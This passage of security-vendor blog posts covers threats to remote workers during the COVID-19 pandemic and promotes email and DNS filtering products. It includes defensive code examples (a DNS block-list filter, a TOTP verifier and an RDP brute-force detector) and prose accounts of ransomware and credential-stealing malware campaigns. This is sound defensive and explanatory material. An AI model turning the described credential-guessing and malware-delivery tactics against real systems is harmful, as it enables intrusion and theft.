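        if category in blocked_categories:
            return ("block", "category:" + category)
    return ("allow", "no match")


def answer(qname, upstream_address):
    """What the client receives: the real A record, the block page for a blocked
    name, or None (refused) for a malformed query."""
    verdict, _reason = decide(qname)
    if verdict == "block":
        return BLOCK_PAGE_IP
    if verdict == "refuse":
        return None
    return upstream_address


if __name__ == "__main__":
    for q in ("WWW.Covid19-Relief-Update.example.", "partner.covid19-relief-update.example",
              "tracker.thepiratebay.example", "news.example"):
        print(q, decide(q), answer(q, "192.0.2.10"))
```

Two caveats a practitioner should keep in mind. First, the filter only sees lookups that are sent to it: a device configured with a hard-coded third-party resolver, or an application using DNS-over-HTTPS, bypasses it entirely, so outbound port 53 and known DoH endpoints should be blocked for anything other than the filter. Second, when a blocked site is HTTPS the browser will show a certificate warning for the block page rather than the block page itself, unless the filter's certificate is trusted on the device.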
WebTitan Cloud can be quickly set up remotely by sysadmins to protect all workers on and off the network with no clients required, which makes it an ideal solution during the COVID-19 pandemic for protecting remote workers.
For further information on protecting your organization and remote employees from web-based attacks, to register for a free trial of WebTitan, and for details of pricing, give the TitanHQ team a call today.
There has been a massive rise in the number of telecommuting workers as a result of the 2019 Novel Coronavirus pandemic and cybercriminals are taking advantage. Phishing and malware attacks have soared in the past few weeks and home workers are being targeted.
Individuals who regularly worked from home before the COVID-19 crisis will be used to taking precautions when connecting to virtual environments set up by their employers, but huge numbers of employees are now logging in remotely for the very first time and may not be aware of the telecommuting cybersecurity risks. IT and IT security departments have also had to set up the workforce for home working in a hurry, and the sheer number of employees that have been forced into telecommuting means corners have had to be cut which has created opportunities for cybercriminals.
Even if the transition to having the entire workforce telecommuting has been expertly managed, risk will have increased considerably. Cybersecurity is far harder to manage when the entire workforce is outside the protection of the corporate firewall and with most workers telecommuting, the attack surface has grown considerably.
Telecommuting workers are seen as low hanging fruit and cybercriminals are taking advantage of the ease at which attacks can be conducted. Since January there has been a massive increase in phishing attacks, malware attacks, and attacks over the internet targeting remote workers.
NASA Sees “Exponential Increase” in Malware Attacks
On April 6, 2020, NASA sent a memo to all personnel warning of a massive increase in targeted attacks on the agency. NASA explained in the memo that the number of phishing attempts on NASA employees had doubled in the past few days and that its systems designed to block employees from accessing malicious websites had gone into overdrive. The number of malicious websites being blocked had also doubled, which strongly suggests employees were clicking links in phishing emails and being fooled by these scams. NASA also reported an "exponential increase in malware attacks on NASA systems."
Attacks are being conducted by a diverse range of threat actors, from small players to prolific advanced persistent threat (APT) groups and nation-state sponsored hackers. NASA has warned its employees that those attackers are targeting NASA employees’ work and personal devices and that the attacks are likely to continue to increase throughout the Novel Coronavirus pandemic.
NASA is far from alone in experiencing a massive increase in attempted cyberattacks. Businesses of all sizes are now having to deal with unprecedented risks and are struggling to defend their networks from attack. They now have to defend a massively increased attack surface and the number of attacks has skyrocketed.
There are other factors that are making it difficult for employers. Employees crave information about the Novel Coronavirus and COVID-19 and cybercriminals are sending huge numbers of emails offering them just the information they seek. Huge numbers of websites are being set up that purport to offer advice on the Novel Coronavirus and COVID-19. Check Point has reported that more than 16,000 domains related to coronavirus or COVID-19 have been registered since January and those domains are 50% more likely to be malicious than other domains registered in the same period.
How to Protect Telecommuting Workers
There are three main ways that telecommuting workers are being attacked: Email, malicious websites, and the exploitation of vulnerabilities.
To prevent the latter, it is essential for software and operating systems to be kept up to date. This can be a challenge for IT departments at the best of times, but much harder when everyone is working remotely. Despite the difficulty, prompt patching is essential. Vulnerabilities in VPNs are being targeted by cybercriminals and offer an easy way to gain access to corporate networks. Employees should be told to make sure their VPN clients are running the latest software version and businesses should ensure their VPN infrastructure is kept up to date, even if it means some downtime while updates are applied.
TitanHQ Can Help You Strengthen Email and Web Security
Advanced email security defenses are now required to protect against phishing and email-based malware threats. Some of the COVID-19 phishing campaigns that are now being conducted include some of the most sophisticated phishing threats we have ever seen.
You should not rely on one form of email security, such as Microsoft’s Exchange Online Protection for Office 365 accounts. Layered defenses are essential. Office 365 email security can be significantly strengthened by layering SpamTitan on top of Microsoft’s EOP protections. SpamTitan does not replace Office 365 protections, it improves them.
SpamTitan is an advanced email security solution that incorporates powerful, real time updated AI-driven threat intelligence to block spam, phishing, malware, malicious links, and other email threats from incoming mail. SpamTitan sandboxing identifies threats that signature-based detection solutions miss and is effective at identifying and blocking zero-day malware threats.
Each day, the number of malicious websites related to COVID-19 grows. These websites are used to phish for sensitive information such as email and VPN credentials and for drive-by downloads of malware. To protect remote workers and prevent them from accessing these malicious websites, a web filtering solution is required.
WebTitan DNS Security offers protection against web-based threats and prevents employees from accessing known malicious websites. WebTitan DNS Security is seeing massively increased traffic demand for its scanning and web detection features, but the solution is cloud based and has been developed with scalability in mind. WebTitan DNS Security blocks new threats as soon as they are identified to keep customers and their employees protected. The solution can be easily implemented to protect remote workers by pointing the DNS settings of enterprise devices at WebTitan. That small change ensures the internet is filtered for all employees, no matter where they are working.
TitanHQ is committed to providing safe and secure email and internet usage for our customers, partners and their users, now more than ever. Contact TitanHQ today for help improving security at your organization.
Blackpoint Cyber announced its Remote Reality LIVE conference, which will occur online April 8th and April 9th 2020.
The conference will focus on managed service providers (MSPs) and how they can stay secure, profitable, and resilient as the world increases remote operations during the COVID-19 pandemic – registration and attendance are free. The two-day conference will include sessions by former leaders of the United States’ government cyber security and intelligence communities as well as cyber security experts and business veterans from the MSP services and technology industry.
Blackpoint Cyber announces its virtual cyber security conference for MSPs – Remote Reality LIVE. Featuring a keynote from the former Acting Director of the CIA and sessions from tech giants Datto, Webroot, Marketopia, and more.
Jon Murchison, Blackpoint’s CEO and founder, and former US government cyber operations expert, explains the conference’s objective: “IT services and infrastructure have become mission critical for organizations to survive in this new economic landscape brought on by COVID-19. MSPs are the key to our success and, especially during these times, a collective national asset to their respective countries. That’s why we are bringing together experienced government and industry leaders to help MSPs navigate the current economic and security environments. We’re excited to provide one of the first online and socially-distanced conferences dedicated to MSPs and cyber security.”
Blackpoint has partnered with leading technology, service, and marketing firms for the conference, including:
Datto: leading global provider of cloud-based software and technology solutions purpose-built for MSPs
Webroot: Cybersecurity Solutions Purpose-Built for MSPs and SMBs
Convergint: Global, Service-based Systems Integrator
Marketopia: Lead Generation and Marketing for Technology Companies
ID Agent: Dark Web and Identity Theft Protection
TitanHQ: Email and DNS Security
Compliancy Group: HIPAA Compliance-as-a-Service
Atlantic Data Forensics: Premier Incident Response and Forensics
ProSource Technology Solutions: Leading Managed Service Provider
Corporate Office Properties Trust (COPT): Premier Real Estate Investment Trust
Michael Morell, former Deputy Director and Acting Director CIA, will present the keynote session on national security implications of the Coronavirus outbreak. While at the CIA, Mr. Morell was President George W. Bush’s daily intelligence briefer during the 9/11 attacks and was awarded the Distinguished Intelligence Medal, the CIA’s second highest honor.
Additional former US government cyber security and intelligence expert speakers include: Bill Priestap, former FBI Assistant Director of Counterintelligence, Chris Inglis, Former Deputy Director of NSA, Dave Sears, retired Commander and Navy SEAL, and Kevin Donegan, former United States Navy Vice Admiral and previous commander of the US Navy’s 5th fleet out of Bahrain. Security and MSP industry leaders will also present informational sessions, such as lead generation in a virtual world, security in the MSP space, cyber security for commercial real estate, the threat landscape of remote workers, and more.
Matt Solomon, VP of Business Development & IT at ID Agent, shares his sentiments on the conference: “ID Agent is very excited to participate in one of the first virtual MSP events since in-person events have been taken off the schedule. MSPs still need education during this period and we are honored to be part of such an esteemed group of vendors.”
In addition to learning how to stay secure and prosper, conference attendees will also be eligible for giveaways and prizes.
IT departments have been forced to address cybersecurity risks with remote workers in a hurry due to the 2019 Novel Coronavirus pandemic that has seen large sections of the workforce forced into working from home.
The International Workplace Group conducted a study in 2019 and found that 50% of employees spend at least half of the week working remotely, and 70% of workers spend at least one day each week working from home. The 2019 Novel Coronavirus pandemic has increased that percentage considerably. Many companies have all but closed down their offices and have told their employees they must work from home.
While this is an important strategy for ensuring the safety of the workforce, there are many cybersecurity risks with remote workers and IT departments will find it much harder to secure their systems, protect confidential data, and quickly respond to security incidents.
One of the biggest problems for IT departments is the speed at which changes had to be made to accommodate a massive increase in remote workers. There has been little time to prepare properly, provide training, and ensure the cybersecurity risks with remote workers are all addressed.
Cybercriminals are Targeting Remote Workers
The massive increase in remote workers due to the 2019 Novel Coronavirus pandemic has given cybercriminals easy targets to attack, and unsurprisingly remote workers are being targeted. Remote workers are seen as low hanging fruit and attacks are far easier than when workers are in the office.
Several phishing campaigns have been detected targeting home workers that attempt to obtain email and VPN credentials. These phishing attacks are likely to increase considerably over the coming weeks and months. Attacks on VPNs have also increased, with cybercriminals exploiting unpatched vulnerabilities to steal credentials and gain access to corporate networks.
Campaigns have been detected spoofing Zoom and other videoconferencing platforms. According to Check Point, there have been 1,700 new Zoom domains registered in 2020 and 25% of those have been registered in the past two weeks. Other videoconferencing and communication platforms are also being targeted.
Addressing Cybersecurity Risks with Remote Workers
The massive increase in the number of employees working from home has increased the attack surface dramatically. Laptops, smartphones, and tablets are remotely connecting to the network, often for the very first time. It is essential that all of those devices are secured and data is appropriately protected.
Any device allowed to connect to the network remotely must have the best security software installed to protect against malware. Devices must be running the latest versions of operating systems and patches need to be applied promptly. Some studies suggest that it takes companies around 3 months on average to patch vulnerabilities. For remote workers, patching needs to be accelerated considerably and, ideally, software and operating systems should be configured to update automatically. Computers used by remote workers must also have firewalls enabled.
Ensure Home Routers are Secured
With many countries in lockdown and people being told not to leave the house, one of the biggest problem areas with remote working has been solved for now: the use of unsecured public Wi-Fi networks. When remote workers connect to unsecured public Wi-Fi networks, it is easy for cybercriminals to intercept sensitive corporate data, steal login credentials, and install malware. The Novel Coronavirus pandemic has seen remote workers abandon coffee shops and public Wi-Fi access points and stay at home; however, home Wi-Fi networks may be just as vulnerable.
Home workers will connect to the internet through consumer-grade routers, which will be far less secure than the office network. Home Wi-Fi is often poorly secured and many devices that connect to it will have scant security controls in place. Remote workers must ensure that their home Wi-Fi network is protected with a strong passphrase and WPA2 (or WPA3) encryption, that WPS is disabled, that the router's default administrator password has been changed, and that the router firmware is up to date.
Ensure Remote Workers Use a VPN and Establish a Secure Connection
It is essential for remote workers to establish a secure connection when accessing work resources and the easiest way to do this is with a virtual private network (VPN). A VPN client should be installed on all devices that you allow to remotely connect to the network.
Several vulnerabilities have been found in VPNs over the past year, and even months after VPN vendors released patches, many of those patches have yet to be applied. Patching VPNs can be difficult when they are in use 24/7, but prompt patching is essential. There has been an increase in cyberattacks exploiting vulnerabilities in VPNs in recent weeks. In addition to ensuring the latest version of VPN clients is used and VPN solutions are patched quickly, training must be provided to remote workers to ensure they know how to use VPNs.
Ensure Multifactor Authentication Is Enabled
Strong passwords must be set to prevent brute force password guessing attempts from succeeding, but passwords alone do not provide sufficient protection for remote workers. You must ensure that multifactor authentication is enabled for all cloud services and for email accounts. If credentials are compromised in a phishing attack, it will not be possible for the credentials to be used to access accounts and sensitive data without another factor also being provided, such as a one-time code sent to an employee's cellphone. A code delivered by SMS is better than nothing, but an authenticator app or hardware token is stronger, since SMS codes can be intercepted through SIM-swap attacks.
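The one-time code is the part of the scheme that makes a phished password insufficient on its own, so it is worth seeing how the server side of that check works. The following added example (not TitanHQ code) generalizes the phone-delivered code above to the authenticator-app form, a time-based one-time password (TOTP, RFC 6238), and includes the two server-side details that are easy to get wrong: tolerating a little clock drift and refusing to accept the same code twice. The shared secret is the RFC 6238 test-vector secret and is used only for the demonstration.

```python
"""Verify a time-based one-time password (TOTP, RFC 6238) as an MFA second factor.

Added example, not TitanHQ code. Generalizes the phone-delivered one-time code to the
authenticator-app form of the same idea. RFC6238_SECRET is the RFC's published test
secret and must never be used for real accounts."""
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """HOTP (RFC 4226): HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, for_time, step=30, digits=6):
    """TOTP (RFC 6238): HOTP with counter = floor(unix_time / step)."""
    return hotp(secret, int(for_time) // step, digits)


class TotpVerifier:
    """Server-side check of a submitted code.

    Accepts the current time step plus `skew` steps either side to tolerate clock
    drift, compares in constant time, and refuses any time step at or before the
    last accepted one so that a captured code cannot be replayed inside its window."""

    def __init__(self, secret, step=30, digits=6, skew=1):
        self.secret, self.step, self.digits, self.skew = secret, step, digits, skew
        self.last_accepted = -1  # highest time-step counter already used

    def verify(self, code, now=None):
        now = time.time() if now is None else now
        counter = int(now) // self.step
        for delta in range(-self.skew, self.skew + 1):
            candidate = counter + delta
            if candidate <= self.last_accepted:
                continue  # already used (or older than a used code): reject replay
            expected = hotp(self.secret, candidate, self.digits)
            if hmac.compare_digest(expected, str(code)):
                self.last_accepted = candidate
                return True
        return False


RFC6238_SECRET = b"12345678901234567890"  # RFC 6238 Appendix B test secret

if __name__ == "__main__":
    verifier = TotpVerifier(RFC6238_SECRET, digits=8)
    code = totp(RFC6238_SECRET, 1111111109, digits=8)
    print("first use:", verifier.verify(code, 1111111109))   # accepted
    print("replay:   ", verifier.verify(code, 1111111109))   # rejected
```

Note that the replay guard is per secret (per user) and has to be persisted by the server; a stateless verifier that only checks the HMAC leaves a thirty-second window in which a code captured by a phishing page can be reused, which is exactly what real-time phishing proxies exploit.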
Security Awareness Training for Remote Workers
IT staff will be well aware that even the best security defenses can be breached as a result of the actions of employees. Employees are the weakest link in the security chain, but through security awareness training risk can be significantly reduced. Most companies will provide security awareness training to staff as part of the onboarding process, and often refresher training sessions will be provided on an annual basis. Consider increasing training for remote workers and conducting training sessions far more frequently.
The purpose of cybersecurity awareness training is to teach employees the skills they will need to recognize and avoid threats and to change the mindset of workers and create a culture of cybersecurity. Best practices for cybersecurity must be taught to prevent employees from falling prey to cyberattacks when working remotely. Employees need to be made aware of the cybersecurity risks with remote workers, which may not have been covered in training sessions when employees were only working in the office. Training remote staff should now be a priority. It is important to step up training to help remote workers identify phishing emails, spoofing, impersonation attacks, and also to teach remote workers about good IT hygiene.
Protect Against Web-Based Attacks
The dangers that come from the internet should be covered in security awareness training, but not all web-based threats are easy for remote workers to identify. Malicious adverts can be found on all manner of websites that direct users to phishing sites and websites where drive by malware downloads occur. To address cybersecurity risks for remote workers when accessing the internet, a web filtering solution should be deployed.
Cloud-based web filters are the most practical choice as they are easy to deploy, require no software downloads, and do not need to be patched or updated as that is handled by the solution provider. DNS-based filters are the best choice because they add negligible latency: only the DNS lookup is inspected, not every packet, which matters when bandwidth in workers' homes is limited.
WebTitan prevents remote workers from visiting or being redirected to known malicious websites and allows IT teams to control the types of websites that can be accessed on work devices to further reduce risk. Since WebTitan integrates with Active Directory and LDAP, IT teams can monitor the internet activity of all employees and can configure the solution to block malicious file downloads and the downloading of unauthorized programs onto work devices.
It is fair to say that more people are now working from home than ever before and the number is growing rapidly due to the coronavirus pandemic. Here we explore some of the key cybersecurity challenges for remote working and suggest ways that CIOs and IT managers can reduce risk, keep their networks secure, and protect their workers.
COVID-19 and Remote Working
Even in the absence of a pandemic, an increasing number of people are working from home for at least part of the week. One study conducted by the International Workplace Group in 2018 suggests 50% of employees spend at least two and a half days a week working from home and 70% spend at least one day a week working from home.
The coronavirus pandemic is rapidly changing that. Governments around the world are recommending people work from home if they possibly can and many want to do so to reduce the risk of contracting COVID-19. With the 2019 Novel Coronavirus pandemic likely to last for several months at the very least, that is unlikely to change any time soon. Businesses will come under increasing pressure to get their employees set up for working at home.
Cybersecurity Challenges for Remote Working
For many businesses, having to set up large numbers of employees to work from home in such a short space of time will have come as a major shock. Rather than being able to transition gradually, the quarantine measures and social distancing demanded in response to the coronavirus pandemic have given businesses and their CIOs and IT teams little time to prepare and address the cybersecurity challenges for remote working.
Some employees will already be working from home some of the time, so they will be familiar with the steps they need to take to access work networks and applications securely from home, but for many workers this will be their first time. Those workers therefore need to be trained and made aware of the additional risks; they must learn how to access work systems remotely and the steps they need to take to do so securely.
Measures need to be considered to reduce the harm that can be caused should devices be lost or stolen, as the risk of device theft increases considerably when IT equipment is taken out of the office. Even if workers are not venturing out of the house to coffee shops, home environments may not be as safe and secure as the office.
Cyberslacking is likely to increase considerably when workers are not being directly supervised due to working at home, so loss of productivity is a real issue. Productivity losses due to people working from home is a key business concern that should be addressed. Cyber risks also increase from internet access at home.
The risk of insider threats also increases with more remote workers. Steps should be taken to reduce the potential for fraud and data theft.
It is relatively easy for organizations to effectively manage risk when users are connected to internal networks when working in the office. Doing the same when most of the workforce is working remotely is a different matter entirely. As the attack surface increases, mitigating risks and protecting against cyberthreats becomes a major challenge.
There are also issues with authentication. A known individual may be attempting to connect to the network, but it becomes harder to determine whether that person is who they claim to be. Authentication measures need to be stepped up a gear.
Many businesses will be faced with the problem of simply not having enough devices to allow workers to work remotely on company-issued devices, so the decision will need to be taken about whether to allow employees to use their personal devices. Personal devices are unlikely to have the same level of protection as company-owned devices and it is much harder to control what employees do on those devices and to protect against malware that could easily be transferred onto the work network.
There is also a greater risk of shadow IT when workers are home-based. The downloading of applications and use of non-authorized tools increases risk considerably. Vulnerabilities may be introduced that can easily be exploited by cybercriminals.
Then there is the problem of having so many people accessing work networks using VPNs. Systems may not be able to cope with the increased number, which means workers will not be able to connect and work from home. IT departments must ensure there is sufficient bandwidth and licenses for VPN solutions. Those VPNs also need to be updated and patched.
These are just some of the many cybersecurity challenges for home working. The list of security concerns is very long.
Cybercriminals are Taking Advantage of a Huge Opportunity
Cybercriminals are constantly changing tactics to attack businesses and the coronavirus pandemic offers them opportunities on a silver platter. It is unsurprising that they are taking advantage. In January, phishing campaigns were launched taking advantage of fear about coronavirus. Those campaigns have increased significantly as the COVID-19 crisis has deepened. Coronavirus and COVID-19 are being used as phishing lures, and COVID-themed emails are being used to distribute malware. Cyberattacks exploiting vulnerabilities in VPNs are also increasing.
As the COVID-19 crisis worsens and lockdowns are enforced, businesses will be forced to have more workers working from home and cyberattacks are likely to continue to increase. Since shutting down the business temporarily or indefinitely simply isn’t an option for most businesses, addressing the cybersecurity challenges for remote working will soon become critical.
Addressing the Cybersecurity Challenges for Home Working
Addressing the cybersecurity challenges for home workers is likely to be difficult. Listed below are some of the steps that should be taken to prepare.
When creating new accounts for home workers, ensure strong passwords are set and use the principle of least privilege to reduce risk.
Enable two-factor authentication.
Ensure workers can connect through VPNs and there are sufficient licenses and bandwidth.
Make sure VPN software is patched and the latest version is installed. Ensure procedures are in place to keep the software updated.
Consider disabling USB ports to prevent the use of portable storage devices. This will reduce the risk of malware infections and the risk of data theft.
Ensure portable devices are protected with encryption. Use software solutions that lock devices in the event of theft or allow devices to be remotely wiped.
Ensure you set up communications channels to allow remote workers to collaborate, such as teleconferencing, chat facilities, document sharing platforms, and SaaS applications. Make sure employees are aware of what can and cannot be shared via chat apps such as Slack and Google Chat.
Ensure staff are trained on new applications, the use of VPNs, and are aware of the additional risks from remote working. Train remote workers on how to identify phishing and other cybersecurity threats.
Ensure policies and procedures are set up for reporting threats to IT security teams. Instruct employees on the correct course of action if they believe they have fallen for a scam.
Implement a DNS filter to prevent employees from accessing high risk websites on corporate-issued devices and block downloads of risky file types.
Ensure email security controls are implemented to block phishing attacks and detect and quarantine malware threats.
How TitanHQ Can Help Protect Remote Workers and Their Devices
TitanHQ has developed two cybersecurity solutions that can help businesses protect their remote workers and their networks from email and web-based threats. Being 100% cloud-based, these solutions are just as effective when employees are working remotely as they are for office workers.
SpamTitan Cloud is a powerful email security solution that protects against the full range of email threats. SpamTitan has advanced threat detection capabilities to detect known and zero-day phishing, spear phishing, malware, botnet, and ransomware threats and ensure the threats never reach inboxes. SpamTitan Cloud also scans outbound email to detect spamming and malware distribution, as well as improving protection against insider threats through tags for sensitive data.
WebTitan Cloud is a DNS filtering solution that provides protection from web-based attacks for users working on and off the network. Being cloud based, there is no need to backhaul traffic to the office to apply filtering controls. Since the filter is DNS-based, clean, filtered internet access is provided with no latency. Controls can easily be applied to restrict access to certain types of websites to prevent cyberslacking and block cybersecurity threats and malware downloads.
Both of these solutions are easy to implement, require no local clients, and can be set up to protect your employees in minutes. They are also available on a free trial if you want to evaluate the solutions before committing to a purchase.
For further information on SpamTitan Cloud Email Security and WebTitan Cloud DNS filtering and to discover how these solutions can help to protect your business and remote workers at this extremely challenging time, give the TitanHQ team a call today.
During this unprecedented time of uncertainty, the health and safety of our employees, customers, partners and their families is one of our main focuses and concerns. Team TitanHQ are fully committed to supporting our partners and customers. The benefits from our email and web security products are even more relevant and important now.
Our fantastic team has jumped at the challenge with vigor and we have mobilized our workforce so that it’s business as usual over this unusual phase. We are taking advice from the government on best practice and have a task force in place to manage our progress.
Customers and partners can rest assured that support teams will continue to be available and product teams are working as normal. If you have any questions or concerns about products, or technical support, please contact us in the usual way. The support team has been trained to be aware of special customer concerns during this period and will escalate any question to the appropriate responsible person or department.
We are aware that this is a sensitive time and we will make sure to go the extra mile to make it easier for our customers. All of us at TitanHQ wish you good health and thank you for your continued support.
Many phishing campaigns have been detected that use the novel coronavirus as a lure and now a new ransomware variant called CoronaVirus has been detected and analyzed by MalwareHunterTeam. CoronaVirus ransomware is being distributed through a malicious website masquerading as software called WiseCleaner, a tool that can be used to clean up the registry and remove duplicate files and junk files from computers. WiseCleaner is a legitimate software tool, but the website used in this campaign is fake.
It is currently unclear how traffic to the website is being generated. Campaigns such as this typically use malvertising for traffic: malicious adverts on ad networks that direct users to malicious websites. These adverts are displayed on many legitimate websites that use third party ad networks to generate extra revenue.
If a website visitor tries to download WiseCleaner from the malicious website (the genuine website is wisecleaner.com), a file named WSHSetup.exe will be downloaded. Executing this file will download two malicious payloads: CoronaVirus ransomware and the Kpot Trojan. The Kpot Trojan is an information stealer that steals a variety of credentials, including Skype, Steam, Discord, VPN, email, and FTP passwords from a variety of different applications. The Kpot Trojan steals information such as banking credentials that have been saved in browsers and can also steal cryptowallets. The executable file also attempts to download other files, although currently only two files are downloaded. The intention may well be to download a cocktail of malware.
When CoronaVirus ransomware is downloaded and executed it encrypts a range of different file types. The encrypted files are renamed using the attacker’s email address, but the original file extension is retained. A ransom note is dropped in each folder where files are encrypted.
Interestingly, the ransom demand is very low. The attackers only charge 0.08 BTC – around $50 – for the keys to decrypt files. This suggests the ransomware component of the attack is not the main aim of the campaign, which is to distribute the Kpot Trojan and potentially other malware payloads. CoronaVirus ransomware may just be a distraction.
There is currently no known decryptor for CoronaVirus ransomware and it is unclear whether the attackers can – or will – supply valid keys that allow encrypted files to be recovered.
Businesses can protect against attacks such as this by ensuring they backup all of their files regularly and store the backups offline. A web filtering solution should also be implemented to prevent malicious files from being downloaded. Web filters can be configured to prevent attempts by employees to visit malicious websites and also to block downloads of risky file types such as .exe files.
For more information on web filtering and to find out how TitanHQ’s web filtering solution, WebTitan, can help to protect your business from web-based cyberattacks, give the TitanHQ sales team a call today.
There are many ways that ransomware can be downloaded onto business networks, but most commonly, ransomware attacks occur via Remote Desktop Protocol (RDP), drive-by downloads, or email.
Scans are performed to discover organizations with open RDP ports, which are then attacked using brute force tactics to guess weak passwords. Cybercriminals also add credentials from historic data breaches to their password lists.
The best way to defend against this method of ransomware delivery is to disable RDP entirely; however, RDP is often required for remote management or remote access to virtual desktops, so this may not be an option. If RDP cannot be disabled, there are steps that should be taken to make it as secure as possible.
Use of strong passwords is important to protect against brute force attempts to guess passwords. You should follow NIST advice on creating complex passwords. Passwords must be unique and not used on any other platform. Two-factor authentication should be implemented to prevent stolen credentials from being used.
You must make sure you are running the latest software versions for servers and clients. RDP connections to listening RDP ports should only be permitted through a secure VPN, and ideally, an RDP gateway should be used. You should also restrict who is permitted to log in to Remote Desktop. Finally, you should use rate limiting to lock users out after a set number of failed attempts to enter the correct password.
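As an added illustration of the lockout advice above (example code, not from the article or from TitanHQ), the following Python detector reads constructed log lines shaped like Windows Security events 4625 and 4624 with logon type 10 (the type an RDP session produces) and reports any source address that exceeds a failure threshold inside a sliding window, together with any later successful RDP logon from that same source. The log format, addresses, usernames and thresholds are all constructed for the example.

```python
"""RDP password-guessing detector over Windows Security log events.

Added example, not part of the original article. Input lines are a
constructed, simplified rendering of Windows Security events 4625 (failed
logon) and 4624 (successful logon); LogonType 10 is RemoteInteractive, the
type an RDP session produces.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: one source address hammers several accounts in seconds
# and then succeeds; a second source fails once and logs in normally; a
# console logon (LogonType 2) is present to show it is ignored.
SAMPLE_LOG = """\
2020-03-20T02:00:01 EventID=4625 LogonType=10 User=administrator Src=203.0.113.7
2020-03-20T02:00:03 EventID=4625 LogonType=10 User=admin Src=203.0.113.7
2020-03-20T02:00:05 EventID=4625 LogonType=10 User=root Src=203.0.113.7
2020-03-20T02:00:07 EventID=4625 LogonType=10 User=jsmith Src=203.0.113.7
2020-03-20T02:00:09 EventID=4625 LogonType=10 User=jsmith Src=203.0.113.7
2020-03-20T02:00:11 EventID=4624 LogonType=10 User=jsmith Src=203.0.113.7
2020-03-20T02:05:00 EventID=4625 LogonType=10 User=mjones Src=198.51.100.4
2020-03-20T02:06:00 EventID=4624 LogonType=10 User=mjones Src=198.51.100.4
2020-03-20T02:30:00 EventID=4625 LogonType=2 User=svc_backup Src=10.0.0.5
"""

RDP_LOGON_TYPE = 10
FAILED_LOGON, SUCCESS_LOGON = 4625, 4624


def parse_line(line):
    """Turn one constructed log line into a dict of typed fields."""
    timestamp, *fields = line.split()
    record = {"ts": datetime.fromisoformat(timestamp)}
    for field in fields:
        key, value = field.split("=", 1)
        record[key] = value
    record["EventID"] = int(record["EventID"])
    record["LogonType"] = int(record["LogonType"])
    return record


def detect_rdp_bruteforce(log_text, threshold=5, window=timedelta(minutes=10)):
    """Return alerts as tuples; a source is reported once per guessing burst.

    ("brute_force", src, failures_in_window, distinct_users, ts)
    ("success_after_bruteforce", src, user, ts)
    """
    failures = defaultdict(deque)   # src -> timestamps of recent failures
    users_tried = defaultdict(set)  # src -> account names attempted
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["LogonType"] != RDP_LOGON_TYPE:
            continue  # console and service logons are out of scope here
        src = rec["Src"]
        if rec["EventID"] == FAILED_LOGON:
            recent = failures[src]
            recent.append(rec["ts"])
            users_tried[src].add(rec["User"])
            while recent and rec["ts"] - recent[0] > window:
                recent.popleft()  # drop failures outside the sliding window
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("brute_force", src, len(recent),
                               len(users_tried[src]), rec["ts"]))
        elif rec["EventID"] == SUCCESS_LOGON and src in flagged:
            # A success right after a guessing burst is the signal that
            # matters most: the lockout did not happen or came too late.
            alerts.append(("success_after_bruteforce", src, rec["User"], rec["ts"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_LOG):
        print(*alert)
```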
Drive-By Ransomware Downloads
Drive-by downloads occur on websites controlled by hackers, either their own sites or insecure sites that have been compromised. Malicious scripts are added to the websites that download ransomware and other malware payloads onto a user’s device when they visit the malicious webpage. This method of attack does not require any user interaction, other than visiting the malicious website. That could occur by clicking a malicious link in an email, via a redirect, or even through general web browsing.
A web filter such as WebTitan is one of the best defenses against drive-by ransomware downloads. WebTitan is a DNS filtering solution that prevents end users from visiting websites known to be malicious. Rather than connecting to the website, the user will be directed to a local block page if they attempt to visit a known malicious website. WebTitan can also be configured to block downloads of risky file types such as executable files.
Ransomware is also commonly delivered via email. This could be via an embedded hyperlink to a website where a drive-by download occurs or via malicious scripts in file attachments. Protecting against email-based attacks requires a defense in depth approach, as no single solution will provide total protection against all email attacks.
An advanced email security solution such as SpamTitan should be implemented. SpamTitan scans all inbound and outbound emails and uses a variety of techniques, including machine learning, to identify and block potentially malicious emails. SpamTitan incorporates two antivirus engines that detect known malware variants and a sandbox to analyze suspicious files for malicious actions. Sandboxing protects against never-before-seen malware and ransomware variants.
End user training is also important to ensure that in the event of a malicious email reaching an end user’s inbox, it can be recognized as such. A web filtering solution will help to ensure that any attempt to visit a malicious website via a hyperlink in an email or email attachment is blocked before ransomware is downloaded.
Ransomware as a Secondary Payload
Several ransomware operators use commodity malware to deliver their ransomware payloads. The threat actors behind DoppelPaymer ransomware have been using the Dridex banking Trojan to deliver their malicious payload, while the Ryuk ransomware gang uses the TrickBot Trojan.
Even if these commodity malware infections are discovered and removed, the ransomware gangs may still have access to systems. These commodity malware infections are often viewed as relatively trivial and when these malware variants are discovered the attacks are not properly investigated. The Trojans are removed, but the ransomware operators continue to spread laterally before deploying their ransomware payloads.
In the case of TrickBot, once it is downloaded it gets to work harvesting data such as password files, cookies, and other sensitive information. Once the attackers have harvested all the data they can, a reverse shell is opened to the Ryuk ransomware operators who perform recon of the network and attempt to gain administrator credentials. They then use PSExec and other Windows tools to deploy ransomware on all devices connected to the network.
That is exactly what happened with the attack on the e-discovery firm, Epiq Global. The initial TrickBot infection occurred in December 2019. Access was provided to the Ryuk operators who deployed the ransomware on February 29, 2020. Prior to the deployment of ransomware, the Ryuk operators compromised computers in all 80 of Epiq’s global offices.
TrickBot and other Trojans are primarily delivered via phishing emails. SpamTitan will help to keep you protected against these Trojans and other ransomware downloaders.
A campaign has been detected that uses alerts about out of date security certificates to fool unsuspecting web users into downloading malware. The warnings have been placed on several legitimate websites that have been compromised by cybercriminals.
When visitors arrive on the compromised websites they are presented with an error message that tells them the digital security certificate has expired and they need to download an updated one. Downloading and running the file results in malware being installed on the user’s device – the Mokes backdoor (aka Smoke Loader) and the Buerak malware downloader.
This tactic of malware distribution is nothing new. Cybercriminals have been using this method for years to fool users into downloading malware under the guise of a browser or Flash update, but this is the first time that expired website security certificate error messages have been used for malware distribution.
